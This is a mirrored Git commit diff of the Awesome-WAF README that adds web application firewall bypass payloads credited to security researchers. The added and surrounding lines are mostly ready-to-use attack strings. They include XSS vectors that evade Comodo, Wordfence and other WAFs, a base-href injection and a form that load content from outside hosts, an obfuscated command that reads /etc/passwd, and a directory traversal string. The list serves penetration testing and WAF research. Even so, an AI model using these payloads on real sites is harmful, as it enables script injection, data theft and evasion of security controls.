mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2025-01-03 13:30:03 +07:00
Code Issues Packages Projects Releases Wiki Activity

Added more xss bypasses from @renwax23 @brutelogic

Browse Source
This commit is contained in:
Infected Drake 2019-07-15 15:27:12 +05:30 committed by GitHub
parent 84280f3751
commit 2a8e5b77d5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 17 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
README.md
View File

@ -2963,6 +2963,7 @@ http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3csc
<svg onload=prompt%26%230000000040document.domain)> <svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)> <svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
1'"><img/src/onerror=.1|alert``>
``` ```
- XSS Bypass by [@RakeshMane10](https://twitter.com/rakeshmane10) - XSS Bypass by [@RakeshMane10](https://twitter.com/rakeshmane10)
``` ```
@ -2981,6 +2982,14 @@ xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
``` ```
javascript:{alert`0`} javascript:{alert`0`}
``` ```
- [XSS Bypass](https://twitter.com/brutelogic/status/1147118371965755393) by [@Brute Logic](https://twitter.com/brutelogic)
```
<base href=//knoxss.me?
```
- [XSS Bypass](https://twitter.com/RenwaX23/status/1147130091031449601) by [@RenwaX23](https://twitter.com/RenwaX23) (Chrome only)
```
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
```
- [RCE Payload Detection Bypass](https://www.secjuice.com/web-application-firewall-waf-evasion/) by [@theMiddle](https://twitter.com/Menin_TheMiddle) - [RCE Payload Detection Bypass](https://www.secjuice.com/web-application-firewall-waf-evasion/) by [@theMiddle](https://twitter.com/Menin_TheMiddle)
``` ```
cat$u+/etc$u/passwd$u cat$u+/etc$u/passwd$u
@ -2989,7 +2998,7 @@ cat$u+/etc$u/passwd$u
``` ```
### Comodo ### Comodo
- XSS Bypass by [0xInfection](https://twitter.com/0xinfection) - XSS Bypass by [@0xInfection](https://twitter.com/0xinfection)
``` ```
<input/oninput='new Function`confir\u006d\`0\``'> <input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme <p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
@ -3311,6 +3320,12 @@ c\\a\\t+/et\\c/pas\\swd
``` ```
"><input/onauxclick="[1].map(prompt)"> "><input/onauxclick="[1].map(prompt)">
``` ```
- [XSS Bypass](https://twitter.com/brutelogic/status/1148610104738099201) by [@Brute Logic](https://twitter.com/brutelogic)
```
data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post>
<input type=hidden name=a value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>">
<input type=submit></form>
```
### URLScan ### URLScan
- [Directory Traversal](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt#L557) by [@ZeQ3uL](http://www.exploit-db.com/author/?a=1275) (<= v3.1) (Only on ASP.NET) - [Directory Traversal](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt#L557) by [@ZeQ3uL](http://www.exploit-db.com/author/?a=1275) (<= v3.1) (Only on ASP.NET)
@ -3349,7 +3364,7 @@ http://host.com/test.asp?file=.%./bla.txt
``` ```
### Wordfence ### Wordfence
- XSS Bypass by [@brutelogic](https://twitter.com/brutelogic) - XSS Bypass by [@brute Logic](https://twitter.com/brutelogic)
``` ```
<a href=javas&#99;ript:alert(1)> <a href=javas&#99;ript:alert(1)>
``` ```